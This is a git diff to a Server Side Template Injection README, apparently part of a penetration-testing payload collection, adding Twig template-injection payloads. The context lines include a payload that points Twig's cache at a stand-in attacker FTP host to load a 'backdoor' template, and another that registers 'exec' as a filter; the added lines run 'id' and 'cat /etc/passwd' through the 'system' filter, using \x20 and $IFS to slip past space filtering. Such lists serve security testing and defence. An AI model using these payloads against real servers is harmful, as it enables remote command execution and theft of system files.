diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 0f780ee..9fc9ac5 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -157,6 +157,9 @@ $output = $twig > render (
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
 ```
 
 Example with an email passing FILTER_VALIDATE_EMAIL PHP.